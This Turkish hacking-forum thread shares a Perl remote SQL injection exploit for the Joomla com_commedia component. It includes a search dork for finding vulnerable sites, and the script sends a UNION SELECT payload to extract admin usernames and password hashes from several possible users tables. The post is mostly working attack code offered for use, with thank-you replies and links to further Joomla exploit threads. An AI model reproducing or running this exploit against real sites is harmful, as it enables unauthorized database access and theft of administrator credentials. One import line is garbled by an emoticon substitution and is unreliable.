Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Joomla Commedia 3.1 SQL Injection
#1
Exploit Title: Joomla commedia Remote Exploit

dork: inurl:index.php?option=com_commedia



Exploit:

#!/usr/bin/perl -w
########################################
# Joomla Component (commedia) Remote SQL Exploit
#----------------------------------------------------------------------------#
########################################
print "\t\t\n\n";
print "\t\n";
print "\t Daniel Barragan D4NB4R \n";
print "\t \n";
print "\t Joomla com_commedia Remote Sql Exploit \n";
print "\t\n\n";
print " :::Opciones de prefijo tabla users:::\n\n";
print " 1. jos_users 2. jml_users 3. muc_users 4. sgj_users \n\n\n";

use LWP::UserAgent;
use HTTP::Request;
use LWP:big_smileimple;

print ":::Opcion::: ";
my $option=<STDIN>;
if ($option==1){&jos_users}
if ($option==2){&jml_users}
if ($option==3){&muc_users}
if ($option==4){&sgj_users}


sub jos_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$table="jos_users";
$d4n="com_commedia&format";
$parametro="down&pid=59&id";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union
all select (select
concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from
".$table."),null--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

if ($answer =~ /<user>(.*?)<user>/){
print "\nLos Datos Extraidos son:\n";
print "\n

* Admin User : $1";

}

if ($answer =~/<pass>(.*?)<pass>/){print "\n

* Admin Hash : $1\n\n";

print "\t\t# El Exploit aporto usuario y password #\n\n";}
else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub jml_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$table="jml_users";
$d4n="com_commedia&format";
$parametro="down&pid=59&id";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union
all select (select
concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from
".$table."),null--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

if ($answer =~ /<user>(.*?)<user>/){
print "\nLos Datos Extraidos son:\n";
print "\n

* Admin User : $1";

}

if ($answer =~/<pass>(.*?)<pass>/){print "\n

* Admin Hash : $1\n\n";

print "\t\t# El Exploit aporto usuario y password #\n\n";}
else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub muc_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$table="muc_users";
$d4n="com_commedia&format";
$parametro="down&pid=59&id";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union
all select (select
concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from
".$table."),null--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

if ($answer =~ /<user>(.*?)<user>/){
print "\nLos Datos Extraidos son:\n";
print "\n

* Admin User : $1";

}

if ($answer =~/<pass>(.*?)<pass>/){print "\n

* Admin Hash : $1\n\n";

print "\t\t# El Exploit aporto usuario y password #\n\n";}
else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub sgj_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$table="sgj_users";
$d4n="com_commedia&format";
$parametro="down&pid=59&id";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union
all select (select
concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from
".$table."),null--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

if ($answer =~ /<user>(.*?)<user>/){
print "\nLos Datos Extraidos son:\n";
print "\n

* Admin User : $1";

}

if ($answer =~/<pass>(.*?)<pass>/){print "\n

* Admin Hash : $1\n\n";

print "\t\t# El Exploit aporto usuario y password #\n\n";}
else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}


Beğenenler: Symxq
#2
Eline sağlık abi exciting
Beğenenler:
#3
(15-09-2014, Saat: 22:05)Symxq Adlı Kullanıcıdan Alıntı: Eline sağlık abi exciting

Teşekkürler Abi Demene Gerek Yok Kardeşim exciting
Beğenenler: Symxq
#4
Teşekkürler
www.deccal.org


Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Joomla Com_Cckjseblod Auto Exploiter FTP Config İndirme Exploit KingSkrupellos 13 257 Dün, Saat: 09:56
Son Yorum: anubis
  Joomla Upload 1.0 H4Sec 40 1,876 22-11-2016, Saat: 19:27
Son Yorum: Efetimi
  Joomla Com_AdsManager Auto Exploiter PerL PHP Kodu KingSkrupellos 5 187 22-11-2016, Saat: 00:37
Son Yorum: Trajedi
  Joomla Com_MyBlog Rasgele Dosya Yükleme Açığı KingSkrupellos 13 328 21-11-2016, Saat: 01:19
Son Yorum: 0xfans
  Joomla Exploitler Zaafiyetlerin İsimleri - 2006 & 2015 KingSkrupellos 8 452 04-11-2016, Saat: 17:40
Son Yorum: Kolonkun
Anahtar Kelimeler

Joomla Commedia 3.1 SQL Injection indir, Joomla Commedia 3.1 SQL Injection Videosu, Joomla Commedia 3.1 SQL Injection Online izle, Joomla Commedia 3.1 SQL Injection Bedava indir, Joomla Commedia 3.1 SQL Injection Yükle, Joomla Commedia 3.1 SQL Injection Hakkında, Joomla Commedia 3.1 SQL Injection Nedir, Joomla Commedia 3.1 SQL Injection Free indir, Joomla Commedia 3.1 SQL Injection Oyunu, Joomla Commedia 3.1 SQL Injection Download


1 Ziyaretçi